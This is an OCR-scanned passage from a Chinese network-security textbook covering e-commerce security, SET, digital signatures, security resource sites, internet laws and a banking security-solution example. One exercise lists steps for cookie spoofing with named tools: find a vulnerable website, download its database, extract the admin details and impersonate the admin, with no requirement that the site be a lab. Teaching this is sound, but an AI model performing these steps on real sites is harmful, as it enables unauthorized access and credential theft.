易 安全 实时 监控 ,提供 实时 改变 安全 策略 的 能 力 、 对 现 有 安全 系统 漏洞 进行 检查 和 安全 教 
育 等 。 
(4) 强化 社会 的 法 律 政策 与 法 律 保障 机 制 , 通 过 健全 法 律 制度 和 完善 法 律 体系 ,来 保证 
合法 网 上 交易 的 权益 ,同时 对 破坏 合法 网 上 交易 权益 的 行为 进行 立法 严惩 。 


14. 电子 商务 的 安全 体系 


电子 商务 安全 体系 包括 4 个 部 分 : 服务 器 端 . 银 行 端 .客户 端 与 认证 机 构 。 其 中 ,服务 
咒 端 主要 包括 服务 端 安全 代理 、 数 据 库 管 理 系统 .审计 信息 管理 系统 .Web 服务 器 系统 等 。 
银行 端 主要 包括 银行 端 安全 代理 、 数 据 库 管理 系统 、 审 计 信息 管理 系统 ,业务 系统 等 。 

服务 器 端 与 客户 端 ,银行 端 进行 通信 ,实现 服务 器 与 客户 的 身份 认证 机 制 ,以 保证 电子 
商务 交易 的 安全 。 


> 7.6.2 电子 商务 的 安全 技术 和 交易 


随 着 网 络 和 电子 商务 的 广泛 应 用 ,网 络 安全 技术 和 交易 安全 也 不 断 得 到 发 展 和 完善 , 特 
别 是 近 几 年 多 次 出 现 的 安全 事故 ,引起 了 国内 外 的 高 度 重视 ,计算 机 网 络 安全 技术 得 到 大 力 
加 强 和 提高 。 安 全 核心 系统 、VPN 安全 隧道 ,身份 认证 ,网络 底层 数据 加 密 和 网 络 入 侵 监 测 
等 技术 得 到 快速 地 发 展 ,可 以 从 不 同 层面 加 强 计算 机 网 络 的 整体 安全 性 。 





用 1. 电子 商务 的 安全 技术 


网 络 安全 核心 系统 在 实现 一 个 完整 或 较 完整 的 安全 体系 的 同时 也 能 与 传统 网 络 协议 保 
持 一 致 , 它 以 密码 核心 系统 为 基础 ,支持 不 同类 型 的 安全 硬件 产品 ,屏蔽 安全 硬件 的 变化 对 
上 层 应 用 的 影响 ,实现 多 种 网 络 安全 协议 ,并 以 此 为 基础 提供 各 种 安全 的 商务 业务 和 应 用 。 

在 前 儿童 介绍 过 的 网 络 安全 包括 : 数据 报 文 的 安全 性 、 服 务 器 安全 性 以 及 网 络 访 问安 
全 性 等 。 网 络 安全 的 隐患 是 多 方面 的 ,包括 计算 机 系统 方面 通信 设备 方面 .技术 方面 .管理 
和 应 用 方面 ,以 及 内 部 和 外 部 等 方面 。 

常用 的 网 络 安全 技术 包括 电子 安全 交易 技术 、 防 火 墙 技术 、 硬 件 隔 离 技 术 、 数 据 加 密 技 
术 、 认 证 技术 ,安全 技术 协议 安全 检测 与 审计 、 数 据 安全 技术 、 计 算 机 病毒 防范 技术 以 及 网 
络 商务 安全 管理 技术 等 。 其 中 ,涉及 网 络 安全 技术 方面 的 内 容 , 前 面 已 经 进行 了 介绍 ,下 面 
重点 介绍 一 下 网 上 交易 安全 协议 和 安全 电子 交易 SET 等 电子 商务 安全 技术 。 








上 2. 网 上 交易 安全 协议 


电子 商务 应 用 的 核心 和 关键 问题 是 交易 的 安全 性 。 由 于 因特网 本 身 的 开放 性 ,使 网 上 
交易 面临 着 各 种 危险 ,需要 提出 相应 的 安全 控制 要 求 。 最 近 几 年 ,信息 技术 行业 与 金融 行业 
联合 制定 了 几 种 安全 交易 标准 ,主要 包括 SSL 标准 和 SET 标准 等 。 
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网 络 安全 电子 交易 (Secure Electronic Transaction,SET) 是 一 个 通过 Internet 等 开放 网 
络 进行 安全 交易 的 技术 标准 ,1996 年 由 两 大 信用 卡 国际 组 织 VISA 和 MasterCard 共同 发 起 
制定 并 联合 推出 。 由 于 得 到 了 IBM、HP、Microsoft 和 RSA 等 大 公司 的 协作 与 支持 ,已 成 为 
事实 的 工业 标准 得 到 认可 。SET 协议 围绕 客户 、 商 家 等 交易 各 方 相互 之 间 身 份 的 确认 ,采用 
了 电子 证 书 等 技术 ,以 保障 电子 交易 的 安全 。SET 向 基于 信用 卡 进行 电子 化 交易 的 应 用 , 提 
供 了 实现 安全 措施 的 规则 。SET 主要 由 3 个 文件 组 成 : SET 业务 描述 .SET 程序 员 指南 和 
SET 协议 描述 。SET 规范 涉及 的 范围 有 加 密 算 法 的 应 用 (如 RSA 和 DES) ,证 书信 息 和 对 
象 格式 ,购买 信息 和 对 象 格式 ,确认 信息 和 对 象 格式 ; 划 账 信息 和 对 象 格式 ; 对 话 实体 之 间 
消息 的 传输 协议 。 

在 SET 的 交易 环境 中 , 比 现实 社会 中 多 一 个 电子 商务 的 安全 性 认证 中 心 
的 安全 性 CA 参与 其 中 ,在 SET 交易 中 认证 是 关键 。 


Es. 数字 签名 


数字 签名 (Digital Signature) 是 指 用 户 用 私 钥 对 原始 数据 加 密 所 得 的 特殊 数字 串 。 用 于 
保证 信息 来 源 的 真实 性 、 数 据 传输 的 完整 性 和 防 抵 赖 性 ,在 网 银 、 证 券 和 电子 商务 等 应 用 
很 广 。 

数字 签名 算法 组 成 主要 有 两 部 分 : 签名 算法 和 验证 算法 。 数 字 签 名 的 过 程 为 甲 先 用 他 
的 密 钥 对 消息 签名 得 到 加 密 文件 ,再 将 文件 发 给 乙 , 最 后 , 乙 用 甲 的 公 钥 验证 甲 的 签名 合法 
性 。 数 字 签 名 的 方法 及 种 类 如 下 。 

1) 手写 签名 或 图 章 的 识别 

将 手写 签名 或 印章 作为 图 像 , 用 光 扫 描 经 光电 转换 后 在 数据 库 中 加 以 存储 , 当 验 证 此 人 
的 手写 签名 或 盖 印 时 ,也 用 光 扫 描 输 入 ,并 将 原 数据 库 中 的 对 应 图 像 调 出 ,用 模式 识别 方法 
比 对 ,以 确认 真 伪 。 这 种 方法 曾 在 银行 会 计 柜台 使 用 过 ,但 由 于 需要 大 容量 的 数据 库存 储 和 
每 次 手写 签名 和 盖 印 的 差异 性 ,这 种 方法 不 适合 在 互联 网 上 传输 。 

2) 生物 识别 技术 

主要 利用 人 体 生 物 特征 进行 身份 认证 的 一 种 技术 。 生 物 特 征 是 一 个 人 的 唯一 表征 ,可 
以 测量 .自动 识别 和 验证 。 生 物 识 别 系统 对 生物 特征 进行 取样 ,提取 其 唯一 的 特征 进行 数字 
化 处 理 , 转 换 成 数字 代码 ,并 进一步 将 其 组 成 特征 模板 存 于 数据 库 。 人 们 同 识别 系统 交互 身 
份 认证 时 ,识别 系统 获取 其 特征 并 与 数据 库 中 特征 模板 比 对 ,以 确定 是 否 匹 配 认 定 。 

3) 密码 、 密 码 代号 或 个 人 识别 码 

主要 是 指 用 一 种 传统 对 称 密 钥 加 /解密 的 身份 识别 和 签名 方法 。 在 对 称 密 钥 加 /解密 认 
证 中 ,在 实际 应 用 方面 经 常 采用 的 是 ID 十 PIN( 身 份 唯一 标识 十 口令 )。 即 发 方 用 对 称 密 钥 
加 密 ID 和 PIN 发 给 收 方 , 收 方 解 密 后 与 后 台 存 放 的 ID 和 口令 进行 比 对 ,达到 认证 的 目的 。 

4) 基于 量子 力学 的 计算 机 

量子 计算 机 比 传统 图 灵 计 算 机 具有 更 强大 功能 ,计算 速度 要 快 几 亿 倍 。 对 采用 的 网 络 
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保密 的 密码 技术 提出 了 挑战 。 是 利用 一 种 新 的 量子 密码 的 编码 方法 , 即 利用 光子 相位 特性 
编码 。 量 子 力学 的 随机 性 非常 特殊 ,破译 密码 时 会 留 下 痕迹 ,甚至 在 密码 被 窃听 的 同时 会 自 
动 改 变 。 

5) 基于 PKI 的 电子 签名 

数字 签名 是 基于 PKI 电 子 签 名 的 一 种 特定 形式 。 电 子 签名 使 用 不 便 , 法 律 上 对 电子 签 
名 做 出 进一步 规定 ,如 上 述 联 合 国贸 发 会 的 (电子 签名 示范 法 》 和 欧盟 的 《电子 签名 共同 框架 
指令 ) 中 就 规定 “可 靠 电 子 签名 ”和 “高 级 电子 签名 ”, 实 际 上 规定 了 数字 签名 的 功能 ,使 数字 
签名 获得 更 好 的 应 用 安全 性 和 可 操作 性 。 目 前 ,具有 实际 意义 的 电子 签名 只 有 公 钥 密码 理 
论 。 所 以 ,目前 国内 外 普遍 使 用 的 还 是 基于 PKI 的 数字 签名 技术 。 


14. 在 Office Word 文档 中 添加 或 删除 数字 签名 方法 


SmartSignSafety For Office 技术 将 电子 签 章 系 统 与 MS Office 紧密 连接 ,实现 在 Word 
和 Excel 文档 中 进行 电子 签 章 。 用 户 在 对 文档 进行 签 章 时 ,系统 基于 PKI 技术 将 数字 证 书 、 
电子 签 章 与 文档 捆绑 在 一 起 ,通过 密码 验证 、 签 名 验证 数字 证 书 验证 确保 文档 防伪 造 、 防 自 
改 、 防 抵赖 ,安全 可 靠 。 并 实现 对 签 章 人 的 身份 识别 ,确保 其 真实 意愿 的 体现 ,防止 事后 抵 
赖 ,有 效 地 杜绝 了 安全 隐患 。 

SmartSignSafety 在 Word 和 Excel 的 工具 栏 中 建立 专用 菜单 ,帮助 用 户 轻 松 实现 电子 
签 章 .手写 签名 .签名 验证 文档 加 密 、 文 档 保护 .背景 水 印 `.Excel 数据 防 复制 等 功能 。 即 使 
用 普通 鼠标 ,也 可 以 得 到 书法 家 般 的 手写 签名 。 完 成 的 签名 文档 如 图 7-32 所 示 。 
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BEED 课外 练习 
由 1. 选择 是 


(1) 在 建立 网 站 的 目录 结构 时 ,最 好 的 做 法 是 。 
A. 将 所 有 的 文件 最 好 放 在 根 目录 下 B. 目录 层次 选 在 3 一 5 层 


C. 按 栏目 内 容 建 立 子 目录 D. 最 好 使 用 中 文 目 录 
(2) 是 网 络 通信 中 标志 通信 各 方 身份 信息 的 一 系列 数据 ,提供 一 种 在 Internet 
上 验证 身份 的 方式 。 
A. 数字 认证 B. 数字 证 书 C. 电子 认证 D. 电子 证 书 
(3) 下 面 哪 种 不 是 跨 站 脚本 的 攻击 形式 
A. 资 取 Cookie B. 钓鱼 C. 蠕虫 攻击 D. 字典 攻击 
(4) 支持 安全 Web 服务 的 协议 是 
A. HTTPS B. WINS C. SOAP D. HTTP 
12. 操作 题 


(1) 在 测试 服务 器 上 用 IIS 配置 https 发 布 一 个 网 站 。 

(2) 为 Microsoft SQL Server 的 某 数据 库 进 行 权限 管理 并 设备 每 天 零点 进行 数据 库 完 
全 备份 。 

(3) 在 虚拟 机 上 自 建 Web 网 站 .并 用 Domain 等 工具 对 其 进行 SQL 注入 攻击 。 

(4) 试用 网 站 猎手 .IECookiesView、 辅 臣 数 据 库 浏览 器 等 工具 进行 Cookies 欺骗 操作 。 

J@ 使 用 网 站 猜 手 查找 到 一 个 具有 Cookies 欺骗 漏洞 的 网 站 。 并 用 网 站 猎手 下 载 该 网 站 
的 数据 库 文件 。 

@ 登录 该 网 站 ,并 注册 一 个 论坛 的 新 用 户 。 再 用 IECookiesView 查看 本 地 的 
Cookie 信息 。 

@ 用 辅 臣 数据 库 浏 览 器 打开 下 载 的 数据 库 文件 ,并 在 其 中 找到 管理 员 的 相应 用 户 
信息 。 

@ 用 管理 员 信息 替换 本 地 注册 用 户 的 Cookie 信息 中 的 相应 内 容 。 重 新 登录 该 网 站 , 测 
试 是 否 出 现 管理 员 身 份 的 自动 登录 。 





本 章 介 绍 常见 的 安全 资源 网 站 、 网 络 安全 网 上 实验 平台 、 网 络 安全 方面 的 政策 法 规 ,并 
以 金融 系统 信息 化 为 例 简单 分 析 如 何 设计 网 络 安全 的 解决 方案 。 


多 = 知识 点 


(1) 常见 的 网 络 安全 资源 网 站 。 
(2) 网 络 安全 实 操 平台 的 注册 和 使 用 。 
(3) 网 络 安 全 相关 政策 和 法 规 。 
(4) 网 络 安全 解决 方案 的 分 析 和 设计 。 


局 司 教 学 B 标 


(1) 掌握 网 络 安全 资源 的 常见 获取 途径 。 

(2) 了 解 常见 网 络 安全 网 上 学 习 资源 网 站 。 

(3) 熟练 使 用 在 线 网 络 实验 平台 。 

(4) 了 解 网 络 安全 方面 的 主要 政策 和 法 规 。 

(5) 了 解 如 何 分 析 和 设计 相关 系统 的 网 络 安全 解决 方案 。 
(6) 重点 掌握 信息 安全 等 级 保护 法 规 和 标准 。 
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8.1 网 络 安全 的 网 上 资源 


(1) 中 央 网 络 安全 和 信息 化 领导 小 组 办 公 室 、 国 家 互联 网 信息 办 公 室 (http://www. 
cac. gov. cn/)。 网 站 内 容 包括 : 中 央 及 相关 部 门 的 权威 发 布 . 网 络 安全 管理 和 动态 ,业界 动 
态 和 政策 法 规 等 。 

(2) 软考 (http://www. rkb. gov. cn) 。 信 息 安 全 工程 师 的 软考 大 纲 。 

(3) 51CTO(Chttp://www. 51cto. com/)。51CTO 是 IT 技术 创新 与 发 展 的 立体 化 服务 
平台 。 

(4) 红 黑 联盟 (http://www. 2cto. com/)。 红 黑 联 盟 网 站 整合 了 网 络 安全 、 系 统 网 络 、 
软件 开发 .网 站 建设 和 运营 等 内 容 , 提 供 面向 个 人 及 企业 的 网 络 安全 及 相关 技术 培训 ,软件 
开发 和 其 他 相关 服务 。 

(5) 中 国 云 安 (http://www. yunsec. net/)。 

云 安 网 站 主要 讨论 网 络 入 侵 攻击 技术 及 网 络 应 用 防御 技术 ,是 理论 结合 实践 的 学 习 
基地 。 

(6) 黑 吧 安全 网 (http://www. myhack58. com/)。 黑 吧 安 全 网 ( 原 黑客 动画 吧 ) 专 注 互 
联网 安全 ,软件 .视频 ,教程 等 技术 资源 的 交流 与 分 享 。 

(7) 上 海 市 精品 课程 网 络 安全 技术 (http://jiatj. sdju. edu. cn/webanq/)。 课 程 负责 人 
是 贾 铁军 教授 ,他 是 上 海 电机 学 院 重点 学 科 * 计 算 机 应 用 技术 ”学术 带 头 人 。 

(8) 深圳 职业 技术 学 院 , 国 家 示范 性 专业 核心 课程 (计算 机 网 络 安全 技术 ) 精 品 课 程 
(http://jpke. szpt. edu. cn/2008/wlaqjs/index. asp) 。 

(9) 西安 电子 科技 大 学 (网 络 安全 理论 与 技术 ) 精 品 资源 共享 课程 (http://jpkc. xidian. 
edu. cn/wlaq/) 。 

(10) 脚本 之 家 (http://www. jb51. net/hack/)。 脚 本 之 家 网 站 定位 于 网 页 制作 教程 、 
网 站 建设 指南 、 网 络 编程、 网 页 素材 下 载 、 网 页 相关 书籍 以 及 网 络 安全 知识 和 操作 系统 知 
识 等 。 

(11) 开放 式 Web 应 用 程序 安全 项 目 (https://www.owasp. org/)。OWASP 支持 商业 
安全 技术 的 合理 使 用 , 它 有 一 个 论坛 ,在 论坛 里 信息 技术 专业 人 员 可 以 发 表 和 传授 专业 知识 
和 技能 。 

(12) Metasploit(https://www. metasploit. com/)。Metasploit 是 一 款 开源 的 安全 漏 
洞 检测 工具 ,可 以 帮助 安全 和 IT 专业 人 士 识别 安全 性 问题 ,验证 漏洞 的 缓解 措施 ,并 管理 专 
家 驱动 的 安全 性 进行 评估 ,提供 真正 的 安全 风险 情报 。 这 些 功能 包括 智能 开发 .代码 审计 、 
Web 应 用 程序 扫描 、 社 会 工程 。 

(13) SecurityFocus(http://www. securityfocus. com/)。SecurityFocus 是 一 家 安全 机 
构 , 提 供 互联 网 安全 信息 来 源 ,可 查看 软件 漏洞 事实 上 的 标准 。 

(14) 瑞星 病毒 资料 库 (http://viruslist. rising. com. cn/) 。 

(15) 国家 互联 网 应 急 中 心 (http://www. cert. org. cn/publish/main/index. html) 。 
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(16) 国家 计算 机 病毒 应 急 处 理 中 心 ,公安 部 计算 机 病毒 防治 产品 检验 中 心 Chttp:// 
www. antivirus-hina. org. cn/ ) 。 

(17) 中 国信 息 安全 网 (http://www. cninfosec. com) 。 

(18) 中 国信 息 安 全 测评 中 心 (http://www. itsec. gov. cn/)。 

(19) 中 国信 息 安 全 认证 中 心 (http://www. isccc. gov. cn/)。 

(20) 中 国 互联 网 络 信息 中 心 (http://www. cnnic. net. cn)。 

(21) 国家 计算 机 网 络 和 人 侵 防 范 中 心 (http://www. nipc. org. cn/)。 

(22) 国家 计算 机 网 络 应 急 技 术 处 理 协 调 中 心 (http://www. cert. org. cn/)。 

(23) 公安 部 信息 安全 等 级 保护 评估 中 心 (http://www. cspec. gov. cn/)。 

(24) 20CN 网 络 安全 小 组 (http://www. 20cn. net/)。 

(25) 中 国 反 垃圾 邮件 联盟 (http://www. anti-spam. org. cn/)。 

(26) 绿 盟 科技 一 一 中 联 绿 盟 信息 技术 (http://www. nsfocus. net/)。 

(27) 安全 信息 网 (http://www. safechina. net/)。 


8.2 网络 安 全 的 实验 平台 


(1) 合 天 网 安 实验 室 (http://www. hetianlab. com/)。 合 天 网 安 实验 室 是 为 广大 用 户 
提供 网 络 安全 在 线 实验 的 信息 安全 学 习 服 务 。 支 持 学 校 教学 ,课程 定制 ,支持 注册 用 户 自 
学 。 提 供 安 全 协议 、Web 安全 、 网 络 攻 防 、 恶 意 人 代码、 防火墙 技术 、 浏 览 器 漏洞 .Android 安 
全 ,脚本 编程 .XP 挑战 赛 技 能 、 逆 向 工程 .网 络 工具 、 密 码 学 、 隐 私 保护 ,漏洞 扫 描 、 虚 拟 网 
VPN、 信 侵 检测 与 防御 等 网 络 安全 课程 。 

实验 特点 及 优势 : MOOE(Massive Open Online Experiments) 是 一 种 全 新 实验 模式 。 
MOOE 采用 虚拟 化 与 SDN 等 纯 软 件 的 技术 ,能 快速 构建 复杂 度 高 .隔离 性 强 的 各 种 实验 环 
境 , 以 解决 传统 实验 室 在 时 间 、 空 间 与 实验 内 容 等 方面 的 限制 。MOOE 与 现行 MOOC 模式 
紧密 结合 ,才能 真正 实现 大 型 开放 式 网 络 教学 。 大 规模 在 线 开放 实验 开创 者 ,让 实验 室 跨 入 
Internet 时 代 。 

(2) 实验 吧 (http://www. shiyanbar. com/)。 实 验 吧 专注 于 IT 在 线 实 验 教学 ,致力 于 
为 计算 机 及 相关 专业 学 生 、IT 爱好 者 IT 从 业者 提供 在 线 实验 平台 与 学 习 资 源 。 

实验 吧 以 提供 IT 在 线 实 训 为 核心 ,通过 完整 的 虚拟 环境 搭建 ,系统 的 技术 课程 ,让 学 员 在 
真实 的 开发 环境 下 ,通过 实验 实 训 的 方式 学 习 IT 技术 ,帮助 学 员 更 快速 地 掌握 IT 职业 技能 。 

实验 吧 提 供 实验 课程 .学 习 答 疑 、 实 验 笔记 、 实 验 录制 (截图 )、 实 验 评价 .学 习 记 录 、 学 习 
计划 等 多 个 互动 功能 ,可 帮助 学 员 更 高 效 地 提高 学 习 效率 。 

(3) 实验 楼 (https://www. shiyanlou. com/)。 实 验 楼 是 国内 领先 的 IT 技术 实 训 平台 ， 
采用 创新 的 “在 线 实验 ”学习 模 式 ,为 学 生 及 在 职 程序 员 提 供 编程 、 运 维 \ 测 试 \ 云 计算 .大 数 
据 、 数 据 库 等 最 新 的 IT 技术 实践 课程 。 

实验 楼 建设 初 囊 是 帮助 学 习 者 通过 动手 实践 收获 知识 ,同时 体会 实验 精神 。 从 实践 切 
入 ,依靠 交互 性 .操作 性 更 强 的 课程 .理论 学 习 加 动手 实践 共同 激发 创造 力 。 
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(4) 蓝 欧 (http://ok.lanou3g. com/)。 蓝 网 是 一 家 集 产 \ 学 \ 研 、 创 为 一 体 的 综合 性 移动 


互联 网 研发 培训 机 构 ,结合 国际 科教 理念 独创 出 FCBS 教学 模式 ,成 为 教育 部 产 学 协作 项 目 
承办 企业 ,主要 致力 于 VR/AR/ 游 戏 .Web 安全 攻防 、HTML 5 全 栈 .PHP 全 栈 、 大 数据 
(Java) ,Android 开发 .UI 设计 、VD 视觉 设计 、 产 品 经 理 、 新 媒体 运营 、3D 打印 等 技术 人 才 的 
培养 。 


8.3 网 络 安全 相关 政策 法 规 网 址 


中 国 计 算 机 信息 网 络 政策 法 规 (http://www. cn-register. com/ policy/)。 

主要 包括 域名 管理 网络 管 理 、 网 络 安 全 三 方面 内 容 。 

1) 域名 管理 

(1) 中 国 互 联网 络 信息 中 心 国家 顶级 域名 争议 解决 程序 规则 [2014/09/09] 。 

(2) 中 国 互 联网 络 信息 中 心 国家 顶级 域名 争议 解决 办 法 [2014/09/09] 。 

(3) 中 国 互 联网 络 信息 中 心 域名 注册 实施 细则 [2012/05/28] 。 

(4) 信息 产业 部 关于 中 国 互联 网 络 域名 体系 的 公告 (2008 年 )[2008/03/19]。 

(5) 中 国 互联 网 络 域 名 管理 办 法 [2004/11/05]。 

(6) 最 高 人 民法 院 关 于 审理 涉及 计算 机 网 络 域名 民事 纠纷 案件 适用 法 律 若干 问题 的 解 


释 [2001/07/17]。 


(7) 关于 审理 域名 纠纷 案件 的 若干 指导 意见 (北京 市 高 级 人 民法 院 )[2000/08/15]。 

(8) 世界 知识 产权 组 织 统一 域名 争议 解决 办 法 补充 规则 [1999/12/01]。 

(9) 世界 知识 产权 组 织 统一 域名 争议 解决 办 法 补充 规则 [1999/12/01]。 

(10) 美国 ( 反 域名 抢 注 消费 者 保护 法 》( 原 文 )[1999/11/29]。 

2) 网 络 管理 

(1) 最 高 人 民法 院 , 最 高 人 民 检 察 院 关 于 办 理 利用 互联 网 ,移动 通讯 终端 声讯台 制 作 、 复 


制 . 出 版 .贩卖 ,传播 淫秽 电子 信息 刑事 案件 具体 应 用 法 律 若干 问题 的 解释 (二 )[2012/07/31]。 


(2) 网 络 商 品 交易 及 有 关 服 务 行为 管理 暂行 办 法 [2012/07/31]。 

(3) 中 华人 民 共 和 国 刑法 修正 案 ( 七 )[2012/07/31]。 

(4) 中 华人 民 共 和 国 侵权 责任 法 [2012/07/31]。 

(5) 工业 和 信息 化 部 关于 进一步 落实 网 站 备案 信息 真实 性 核验 工作 方案 (试行 )[2010/ 


02/23]。 


(6)“ 两 高 "明确 利用 互联 网 手机 等 传播 淫秽 电子 信息 犯罪 行为 适用 法 律 标准 [2010/02/09]。 
(7) 信息 网 络 传播 权 保护 条 例 [2006/09/11] 。 

(8) 互联 网 新 闻 信 息 服 务 管 理 规定 [2005/09/27]。 

(9) 互联 网 著作 权 行 政 保 护 办 法 [2005/05/25]。 

(10) 互联 网 IP 地 址 备案 管理 办 法 [2005/02/25] 。 

3) 网 络 安全 

(1) 中 华人 民 共 和 国保 守 国家 秘密 法 [2012/07/31] 。 
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(2) 工业 和 信息 化 部 下 发 (关于 加 强 互联 网 域名 系统 安全 保障 工作 的 通知 汇 2010/02/09]。 
(3) 通信 网 络 安全 防护 管理 办 法 [2010/02/05] 。 

(4) 电子 认证 服务 管理 办 法 [2005/02/25] 。 

(5) 计算 机 信息 系统 国际 联网 保密 管理 规定 [2002/01/01] 。 

(6) 计算 机 信息 网 络 国际 联网 安全 保护 管理 办 法 [1997/12/11]。 


8.4 网 络 安全 解决 方案 分 析 设 计 示 例 





在 金融 业 日 益 现 代 化 、 国 际 化 的 今天 ,我 国 的 各 大 银行 注重 服务 手段 进步 和 金融 创新 ， 
不 仅 依靠 信息 化 建设 实现 了 城市 间 的 资金 汇 划 、 消 费 结 算 、 储 蓄 存 取款 、 信 用 卡 交易 电子 化 、 
开办 了 电话 银行 等 多 种 服务 ,而 且 以 资金 清算 系统 、 信 用 卡 异 地 交易 系统 形成 了 全 国 性 的 网 
络 化 服务 。 此 外 ,许多 银行 开通 了 环球 同业 银行 金融 电信 协会 或 环球 银行 间 金 融通 信 协 会 
(Society for Worldwide Interbank Financial Telecommunications,SWIFT) 系 统 , 并 与 海外 
银行 建立 了 代理 行 关系 ,各 种 国际 结算 业务 往来 的 电文 可 在 境内 外 之 间 瞬 间 完 成 接收 与 发 
送 ,为 企业 国际 投资 ,贸易 和 其 他 交往 以 及 个 人 汇 人 汇 出 境外 汇款 ,提供 了 便捷 的 金融 服务 。 





有 1. 金融 系统 信息 化 现状 分 析 


金融 行业 信息 化 系统 经 过 多 年 的 发 展 建设 ,目前 信息 化 程度 已 达到 了 较 高 水 平 。 信 息 
技术 在 提高 管理 水 平 ,促进 业务 创新 、 提 升 企业 竞争 力 方面 发 挥 着 日 益 重要 的 作用 。 随 着 银 
行 信息 化 的 深入 发 展 ,银行 业务 系统 对 信息 技术 的 高 度 依赖 ,银行 业 网 络 信息 安全 问题 也 日 
益 严 重 , 新 的 安全 威胁 不 断 涌现 ,并 且 由 于 其 数据 的 特殊 性 和 重要 性 ,更 成 为 黑客 攻击 的 重 
要 对 象 ,针对 金融 信息 网 络 的 计算 机 犯罪 的 案件 呈 逐 年 上 升 趋势 ,特别 是 银行 全 面 进入 业务 
系统 整合 ,数据 大 集中 的 新 的 发 展 阶段 ,以 及 银行 卡 `. 网 上 银行 ,电子 商务 \ 网 上 证 券 交 易 等 
新 的 产品 和 新 一 代 业 务 系统 的 迅速 发 展 , 现 在 不 少 银行 开始 将 部 分 业务 放 到 互联 网 上 ,今后 
几 年 内 将 迅速 形成 一 个 以 基于 TCP/IP 协议 为 主 的 复杂 的 、 全 国 性 的 网 络 应 用 环境 ,来 自 外 
部 和 内 部 的 信息 安全 风险 将 不 断 增加 ,这 就 对 金融 系统 的 安全 性 提出 了 更 高 的 要 求 ,金融 信 
息 安全 对 金融 行业 稳定 运行 、 客 户 权益 乃至 国家 经 济 金融 安全 、 社 会 稳定 都 具有 越 来 越 重要 
的 意义 。 金 融 业 迫切 需要 建设 主动 的 、 深 层 的 ,立体 的 信息 安全 保障 体系 ,保障 业务 系统 的 
正常 运转 ,保障 企业 经 营 使 命 的 顺利 实现 。 

目前 ,我 国 某 金 融 行业 典型 网 络 拓扑 结构 如 图 8-1 所 示 ,通常 为 一 个 多 级 层次 化 的 互联 
广域网 体系 结构 。 


人 2. 网络 系统 面临 的 风险 


随 着 我 国 金融 改革 的 进行 ,各 个 银行 纷纷 将 竞争 的 焦点 集中 到 服务 手段 上 ,不 断 加 大 电 
子 化 建设 投入 ,扩大 计算 机 网 络 规模 和 应 用 范围 。 但 是 ,应 该 看 到 ,电子 化 在 给 银行 带 来 利 
益 的 同时 ,也 给 银行 带 来 了 新 的 安全 问题 ,并 且 , 这 个 问题 现在 显得 越 来 越 紧迫 。 
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图 8-1 金融 行业 互联 广域网 体系 结构 


网 络 系统 面临 安全 风险 的 主要 原因 如 下 。 

(1) 伴随 我 国 经 济 体制 改革 ,特别 是 金融 体制 改革 的 深入 、 对 外 开放 的 扩大 ,金融 风险 
迅速 增 大 。 防 范 和 化 解 金融 风险 成 了 各 级 政府 和 金融 部 门 非常 关注 的 问题 。 

(2) 计算 机 网 络 的 快速 发 展 和 广泛 应 用 ,系统 的 安全 漏洞 也 随 之 增加 。 多 年 以 来 ,银行 
迫 于 竞争 的 压力 ,不断 扩大 电子 化 网 点 、 推 出 电子 化 新 品种 ,忽略 了 计算 机 管理 制度 和 安全 
措施 的 建设 ,使 计算 机 安全 问题 日 益 突出 。 

(3) 金融 网 络 系统 正在 向 国际 化 方向 发 展 ,计算 机 技术 日 益 普及 ,网 络 威胁 和 隐患 也 在 
不 断 增加 ,利用 计算 机 犯罪 的 案件 呈 逐 年 上 升 趋势 ,这 也 人 迫切 要 求 银 行 信息 系统 具有 更 高 的 
安全 防范 体系 和 措施 。 

金融 行业 网 络 系统 面临 的 内 部 和 外 部 风险 复杂 多 样 ,主要 风险 如 下 。 

(1) 组 织 方面 的 风险 。 缺 乏 统一 的 安全 规划 和 安全 职责 部 门 。 

(2) 技术 方面 的 风险 。 安 全 保护 措施 不 充分 。 尽 管 已 经 采用 了 一 些 安全 技术 和 安全 产 
品 , 但 是 目前 安全 技术 的 采用 是 不 足 的 ,存在 大 量 这 样 .那样 的 风险 和 漏洞 。 

(3) 管理 方面 的 风险 。 安 全 管理 有 待 提 高 ,安全 意识 培训 、 安 全 策略 和 业务 连续 性 计划 
都 需要 完善 和 加 强 。 

【案例 8-1】 XX 信息 技术 公司 于 1992 年 成 立 并 通过 ISO 9001 认证 ,注册 资本 5600 万 元 
人 民 币 。 公 司 主要 提供 网 络 安 全 产品 和 网 络 安全 解决 方案 ,公司 的 安全 理念 是 解决 方案 
PPDRRM,PPDRRM 将 给 用 户 带 来 稳定 安全 的 网 络 环 境 ,PPDRRM 策略 覆盖 了 安全 项 目 
中 的 产品 、 技 术 、 服 务 、 管 理 和 策略 等 内 容 ,是 一 个 完善 .严密 、 整 体 和 动态 的 安全 理念 。 

网 络 安全 解决 方案 PPDRRM, 如 图 8-2 所 示 。 

(1) 综合 的 网 络 安 全 策略 (Policy) 。 综 合 的 网 络 安 全 策略 是 安全 解决 方案 的 第 一 个 P， 
主要 根据 企 事业 用 户 的 网 络 系统 实际 状况 ,通过 具体 的 安全 需求 调研 分析、 论证 等 方式 , 确 
定 出 切实 可 行 的 综合 的 网 络 安全 策略 ,包括 环境 安全 策略 、 系 统 安全 策略 、 网 络 安全 策略 等 。 
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(2) 全 面 的 网 络 安全 保护 (Protect)。 全 面 的 网 络 安 全 
保护 是 安全 解决 方案 中 的 第 二 个 P, 主 要 提供 全 面 的 保护 
措施 ,包括 安全 产品 和 技术 ,应 当 结 合用 户 网 络 系统 的 实际 
情况 来 制定 ,内 容 包括 防火 墙 保护 、 防 病毒 保护 、 身 份 验证 
保护 .入侵 检测 保护 等 。 

(3) 连续 的 安全 风险 检测 (Detect)。 连 续 的 安全 风险 
检测 是 安全 解决 方案 中 的 D, 主 要 通过 评估 工具 、 漏 洞 技术 
和 安全 人 员 , 对 用 户 的 网 络 、 系 统 和 应 用 中 可 能 存在 的 安全 
风险 和 威胁 隐患 ,连续 地 进行 全 面 的 安全 风险 检测 和 评估 。 图 8-2 网 络 安全 解决 方 

(4) 及 时 的 安全 事故 响应 (Response)。 及 时 的 安全 事 案 PPDRRM 
故 响应 是 安全 解决 方案 中 的 第 一 个 民 ,主要 指 对 企 事业 用 
户 的 网 络 、 系 统 和 应 用 可 能 遇 到 的 安全 入 侵 事 件 ,及 时 做 出 快速 地 响应 和 处 理解 决 。 

(5) 迅速 的 安全 灾难 恢复 (Recovery)。 迅 速 的 安全 灾难 恢复 是 安全 方案 中 的 第 二 个 及 
